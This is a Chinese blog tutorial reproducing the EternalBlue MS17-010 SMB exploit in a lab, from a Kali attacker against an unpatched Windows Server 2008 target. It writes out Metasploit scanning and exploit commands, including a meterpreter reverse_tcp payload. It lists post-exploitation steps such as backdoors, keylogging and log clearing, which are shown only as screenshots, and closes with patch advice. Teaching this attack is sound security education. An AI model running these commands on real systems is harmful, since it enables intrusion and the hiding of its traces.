永恒之蓝MS17-010实战案例

已于 2023-07-23 18:10:20 修改
阅读量1.2k 收藏 3
点赞数 1
分类专栏: 漏洞复现 渗透测试 文章标签: 安全
于 2022-11-26 20:46:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_36585338/article/details/128056750
版权

kali_漏洞复现-1

0x001漏洞简介

永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

0x002漏洞原理

  • 远程代码执行漏洞(MS17-010)
  • SMB协议是一个通过网络在共享文件、打印设备、命名管道、邮槽之间操作数据的协议。利用该协议,客户端就可以去访问服务器上的共享文件和目录(增删改查)、打印队列和进程间通信服务等,还可以实现客户端和服务器之间的远程过程子协议的认证传输
  • Windows的SMB服务处理 SMBv1接收的特殊设计的数据包,发生缓冲区溢出,导致攻击者在目标系统上可以执行任意代码

0x003漏洞影响

#注意前提是没有打上相应的漏洞补丁
#用户版本:
	Windows10_2016以前版本,Windows7,Windows_8.1,Windows XP
#服务器版本:
	Windows_Vista版本,Windows_Server_2003版本,Windows_Server_2008版本,Windows_Serve_2012版本WindowsWindows_Server_2016版本
# wusa /uninstall 表示卸载,/kb:XXXXXXX 为要卸载的更新。回车以后,指定的更新即可完美卸载

0x004漏洞复现

环境搭建
  • 攻击机kali

在这里插入图片描述

  • 靶机win2008(未打补丁 (系统补丁 KB号:KB976932 病毒补丁KB号:KB4012212))

在这里插入图片描述
在这里插入图片描述

目标发现

在这里插入图片描述

目标扫描

在这里插入图片描述

漏洞探测
1.启动metaspiot框架
msfconsole
2.搜索ms17探测模块
msf6 > search ms17 type:auxiliary	
	auxiliary/scanner/smb/smb_ms17_010
3.使用该模块
msf6 > use auxiliary/scanner/smb/smb_ms17_010
4.查看选项	yes为必选项
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options 
  RHOSTS                            yes       The target host(s)	//目标
  RPORT        445                  yes       The SMB service port (TCP)	//端口
  THREADS      1                    yes       The number of concurrent threads	//线程
5.设置目标主机
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.13.141
rhosts => 192.168.13.141
6.设置线程
msf6 auxiliary(scanner/smb/smb_ms17_010) > set threads 9
threads => 9
7.开始扫描
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

在这里插入图片描述

漏洞利用
1.搜索模块
msf6 auxiliary(scanner/smb/smb_ms17_010) > search ms17 type:exploit
	exploit/windows/smb/ms17_010_eternalblue      2017-03-14
2.使用模块
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue 
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
3.设置攻击载荷
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
4.查看选项
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options 
  RHOSTS                     yes       The target host(s),
  LHOST     192.168.13.145   yes       The listen address
  LPORT     4444             yes       The listen port
5.设置选项
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.13.141
rhosts => 192.168.13.141
6.运行
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

在这里插入图片描述

后渗透测试
获取当前用户

在这里插入图片描述

后门创建

在这里插入图片描述

开启远程桌面
调用模块

在这里插入图片描述

使用meterpreter终端命令

在这里插入图片描述

远程桌面

在这里插入图片描述

上传后门木马
生成木马

在这里插入图片描述

本地监听——等待鱼饵上钩

在这里插入图片描述

上传木马

在这里插入图片描述

鱼饵上钩

在这里插入图片描述

键盘监听

在这里插入图片描述

日志清除

在这里插入图片描述

0x005漏洞修复

1.根据相应系统类型安装补丁
2.更新系统版本
3.关闭SMB端口,将匿名访问禁用
[系统安全] 二十六.WannaCry勒索病毒分析 (2)MS17-010漏洞利用及蠕虫解析
杨秀璋的专栏
03-01 9094
作者前文采用Github资源实现永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
[系统安全] 二十五.WannaCry勒索病毒分析 (1)Python复现永恒之蓝漏洞实现勒索加密
热门推荐
杨秀璋的专栏
02-27 1万+
作者前文介绍了逆向分析之OllyDbg动态调试工具,包括INT3断点、反调试、硬件断点和内存断点。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,第一篇文章将采用Github资源实现永恒之蓝漏洞利用及Windows7系统文件加密。希望这系列文章对您有所帮助,漫漫长征路,偏向虎山行。享受过程,一起加油~
永恒之黑漏洞复现&漏洞描述
couldt的博客
04-17 738
渗透测试,漏洞复现
永恒之蓝”勒索软件样本分析及一线案例处置分享
weixin_34185512的博客
05-15 1185
1.样本收集 网上收集整理了已有的样本MD5,下载地址: https://gist.github.com/Blevene/42bed05ecb51c1ca0edf846c0153974a 同时结合US-CERT收集的样本列表: https://www.us-cert.gov/sites/default/files/ALERT_TA17-132A.xls...
ms17-010 发现与攻击
最新发布
hkfuguiI的博客
04-07 306
4.找到 auxiliary/scanner/smb/smb_ms17_010 /use 24 命令查询漏洞 并使用show options查看属性。10.查看用户是否存在于Administrators中,并使用net start TermService命令建立远程连接 并且在本机上实现远程连接。5.RHOSTS 为目标地址且必须输入,用set RHOSTS ip 命令对其进行漏洞排查,THREADS 参数为。7.端口设置完成后应用,在kali中监听该端口,并开始对你喜欢的ip进行攻击。
[ MSF使用实例 ] 利用永恒之蓝(MS17-010)漏洞导致windows靶机蓝屏并获取靶机权限
qq_51577576的博客
10-20 4360
[ MSF使用实例 ] 利用永恒之蓝(MS17-010)漏洞导致windows靶机蓝屏并获取靶机权限 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。
ms17-010复现
qq_43398810的博客
03-07 1164
ms17-010复现 攻击机kali IP :192.168.70.31 目标机win7 IP:192.168.70.16 打开kali 的msf 输入search ms17-010 查询这个漏洞 选择攻击模块: use exploit/windows/smb/ms17_010_eternalblue 将目标IP 输入进去: set RHOST 目标 set RHOST 192.168...
MS17-010复现
m0_50036713的博客
06-04 606
MS17-010复现
ms17_010复现
weixin_43736033的博客
01-14 343
利用的是NSA爆出来的工具箱 攻击机IP:10.1.6.154 靶机IP :10.1.6.153 靶机系统 : windows7 x64 Target ip : 设置目标 IP 10.1.6.153 Callback IP: 设置本地 IP 10.1.6.154 Use Redirection:设置重定向 no 设置日志目录 : C:\logs 设置项目名称 Fb > ...
永恒之蓝(MS17-010)漏洞攻击实验
qq_37340973的博客
11-12 2392
前言    “永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限,利用445端口入侵,获取shell进行提权。   工具:kali、windows7 一、开始攻击  ip:kali 192.168.1.100            windows7:192.168.1.101 首先我们ping一下目标靶机(windows7)   进入kali系统的msfconsole攻击框架 搜索MS17-010漏洞,先使用auxiliary/scanner/smb/smb_ms17_010
[系统安全] 九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御
杨秀璋的专栏
12-28 9868
系统安全系列作者将深入研究恶意样本分析、逆向分析、攻防实战Windows漏洞利用等,通过在线笔记和实践操作的形式分享与博友们学习,希望能与您一起进步。前文介绍了Windows远程桌面服务漏洞CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击。这篇文章将详细讲解MS08-067远程代码执行漏洞CVE-2008-4250),它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口,并通过Metasploit工具获取shell及进行深入的操作。
渗透测试18---Metasploit 实战
初遇我ㄖ寸の热情呢?
04-14 7807
Metasploit简称msf (msf5>banner 看一些花里胡哨的东西) 1.nmap与msf配合的完整案例 nmap与msf配合的流程 0.漏洞发布:无论是操作系统层次还是应用层次的,都会发布漏洞(比如:MS08-067)。我们要关注信息。(微软的漏洞都会以MS开头,其他漏洞可能是CVE-之类的,search的时候可以查找到) 有时候会发布在公共的平台里面 1.确定需求...
永恒之蓝EternalBlue(ms17-010)复现
yiyiiyiy的博客
11-24 5357
前言 漏洞描述Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,电脑只要开机,攻击者就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。漏洞复现 环境搭建角色 系统版本 IP 备注 靶机 windows 7 (x64) 192.168.198.131 打开445端口,关闭防火
MS17-010漏洞复现
Al345__的博客
07-01 1550
1、永恒之蓝介绍:永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。
MS17-010永恒之蓝)复现
m0_52701599的博客
01-11 510
永恒之蓝漏洞复现
永恒之蓝ms17-010复现
purvispanwu的博客
02-28 399
使用工具:Metasploit 一、环境准备 kali虚拟机 IP:192.168.112.66 server2008 ip:192.168.112.135 二、Metasploit简介 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发、代码审计、Web应用程序扫描、社会工程等。 Metasploit框架(Metasploit Framework,MSF)是一个开源工
永恒之蓝(ms17-010)复现
li2495735120的博客
10-15 176
复现ms17-010
永恒之蓝MS17-010)的复现
Leslieyzz的博客
01-15 679
永恒之蓝MS17-010)的复现
虚拟机复现MS17-010
微光feng的博客
12-11 3493
本文使用两台虚拟机复现了著名漏洞永恒之蓝MS17-010),两台虚拟机进行了攻防演练,kail利用MS17-010漏洞成功拿到了Windows的系统权限。
永恒之蓝ms17-010虚拟机
05-10
永恒之蓝是一种利用Windows操作系统中的漏洞进行攻击的恶意软件,而MS17-010则是Windows操作系统中的一个漏洞,被恶意软件利用后可以导致系统被攻击者控制。为了学习和测试永恒之蓝的攻击和防御,可以使用一个搭载了漏洞系统的虚拟机进行实验。常见的永恒之蓝ms17-010虚拟机有Metasploitable、VulnHub等,你可以在官网上下载相应的虚拟机镜像,并通过虚拟机软件(如VMware、VirtualBox)进行安装和使用。需要注意的是,这种虚拟机仅用于学习和测试目的,不得用于非法活动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值